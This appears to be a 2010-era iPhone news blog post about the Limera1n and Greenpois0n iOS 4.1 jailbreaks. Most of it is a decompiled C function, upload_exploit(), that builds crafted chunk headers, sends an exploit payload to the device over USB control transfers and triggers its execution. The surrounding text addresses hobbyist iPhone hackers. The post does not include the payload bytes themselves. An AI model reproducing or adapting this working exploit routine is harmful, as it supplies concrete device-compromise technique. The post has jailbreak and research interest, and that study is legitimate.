Limera1n and Greenpois0n: meet the code behind the exploit (iPhone jailbreak exploit code)

Both Limera1n and Greenpois0n jailbreak solutions for iDevices running iOS 4.1 use the same exploit, which was apparently first discovered by geohot some 6 months ago.

If you’re a programmer or a hacker, the code of this exploit might be something you are interested in.

Luckily an anonymous web user posted what appears to be the decompiled exploit function of greenpois0n (linux version), so anyone interested can have a look at it. Obviously it’s not of much use to the regular user, but this should be interesting info for beginning iPhone hackers.

We’ve also posted the greenpois0n exploit code below for your convenience.

signed int __cdecl upload_exploit()
{
int v0; // eax@1
signed int v1; // edx@2
int v2; // ebx@2
int v3; // eax@4
char *v4; // eax@5
unsigned int v5; // ebx@8
int v6; // ecx@14
signed int result; // eax@15
signed int v8; // ST38_4@18
int v9; // eax@28
signed int v10; // [sp+38h] [bp-1030h]@4
signed int v11; // [sp+3Ch] [bp-102Ch]@2
char v12; // [sp+4Ch] [bp-101Ch]@3
char v13; // [sp+84Ch] [bp-81Ch]@5
int v14; // [sp+104Ch] [bp-1Ch]@1

v14 = *MK_FP(__GS__, 20);
v0 = *(_DWORD *)(device + 16);
if ( v0 == 8930 )
{
v11 = 174080;
v1 = -2080198655;
v2 = -2080129124;
}
else
{
v1 = -2080231423;
v11 = 141312;
v2 = (((v0 == 8920) – 1) & 0xFFFFFFF4) – 2080161884;
}
memset(&v12, 0, 0×800u);
memcpy(&v12, exploit, 0×230u);
if ( libpois0n_debug )
{
v8 = v1;
((void (__cdecl *)(int, signed int, _DWORD))__fprintf_chk)(stderr, 1, “Resetting device counters\n”);
v1 = v8;
}
v10 = v1;
v3 = irecv_reset_counters(client);
if ( v3 )
{
irecv_strerror(v3);
__fprintf_chk(stderr, 1, &aCannotFindS[12]);
result = -1;
}
else
{
memset(&v13, -858993460, 0×800u);
v4 = &v13;
do
{
*(_DWORD *)v4 = 1029;
*((_DWORD *)v4 + 1) = 257;
*((_DWORD *)v4 + 2) = v10;
*((_DWORD *)v4 + 3) = v2;
v4 += 64;
}
while ( (int *)v4 != &v14 );
if ( libpois0n_debug )
((void (__cdecl *)(int, signed int, _DWORD))__fprintf_chk)(stderr, 1, “Sending chunk headers\n”);
v5 = 0;
irecv_control_transfer(client, 33, 1, 0, 0, &v13, 2048);
memset(&v13, -858993460, 0×800u);
do
{
v5 += 2048;
irecv_control_transfer(client, 33, 1, 0, 0, &v13, 2048);
}
while ( v5 < v11 );
if ( libpois0n_debug )
((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Sending exploit payload\n");
irecv_control_transfer(client, 33, 1, 0, 0, &v12, 2048);
if ( libpois0n_debug )
((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Sending fake data\n");
memset(&v13, -1145324613, 0x800u);
irecv_control_transfer(client, 161, 1, 0, 0, &v13, 2048);
irecv_control_transfer(client, 33, 1, 0, 0, &v13, 2048);
if ( libpois0n_debug )
((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Executing exploit\n");
irecv_control_transfer(client, 33, 2, 0, 0, &v13, 0);
irecv_reset(client);
irecv_finish_transfer(client);
if ( libpois0n_debug )
{
((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Exploit sent\n");
if ( libpois0n_debug )
((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Reconnecting to device\n");
}
client = (void *)irecv_reconnect(client, 2u);
if ( client )
{
result = 0;
}
else
{
if ( libpois0n_debug )
{
v9 = irecv_strerror(0);
__fprintf_chk(stderr, 1, &aCannotFindS[12], v9);
}
__fprintf_chk(stderr, 1, "Unable to reconnect\n");
result = -1;
}
}
if ( *MK_FP(__GS__, 20) != v14 )
__stack_chk_fail(v6, *MK_FP(__GS__, 20) ^ v14);
return result;
}

Tags: code, exploit, geohot, Greenpois0n, hack, iOS 4.1, iPhone, iTouch, jailbreak, Limera1n, Linux

Related posts:

1. greenpois0n iPhone / iPad / iTouch iOS 4.1 jailbreak source code available to download
2. Interview with posixninja from The Chronic Dev Team about Greenpois0n iPhone jailbreak and more
3. Another unofficial Greenpois0n iPhone iOS 4.1 jailbreak FAQ

Sign up to receive latest iPhone World news and updates via e-mail, RSS, Twitter or Facebook!